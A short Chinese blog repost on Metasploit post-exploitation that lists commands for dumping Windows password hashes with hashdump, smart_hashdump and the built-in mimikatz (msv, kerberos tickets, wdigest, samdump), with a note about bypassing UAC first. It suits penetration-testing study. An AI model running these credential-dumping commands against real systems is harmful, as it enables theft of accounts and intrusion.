码迷,mamicode.com
首页 > 其他好文 > 详细

msf之hash攻击

时间:2019-03-11 13:07:53      阅读:276      评论:0      收藏:0      [点我收藏+]

标签:erb   查看   comm   crypto   src   http   VID   管理权限   证书   

 使用hashdump抓取密码(需要系统管理权限)

技术图片

 

另外一个更强大的模块 smart_hashdump

技术图片

 

 

如果目标是win7 就需要先绕过UAC 

 

还可以使用msf内置的mimikatz抓取hash

技术图片

msv

技术图片

 

kerberos 抓取系统票据

 

 技术图片

wdigest 获取系统账户信息

技术图片

 

mimikatz_command -f samdump::hashed 抓取hash

mimikatz_command -f handle::list 查看进程

mimikatz_command -f service::list windows 服务

mimikatz_command -f crypto::listProviders 查看系统证书 支持PowerShell调用(Invoke-Mimikatz)

 

msf之hash攻击

标签:erb   查看   comm   crypto   src   http   VID   管理权限   证书   

原文地址:https://www.cnblogs.com/-qing-/p/10509861.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!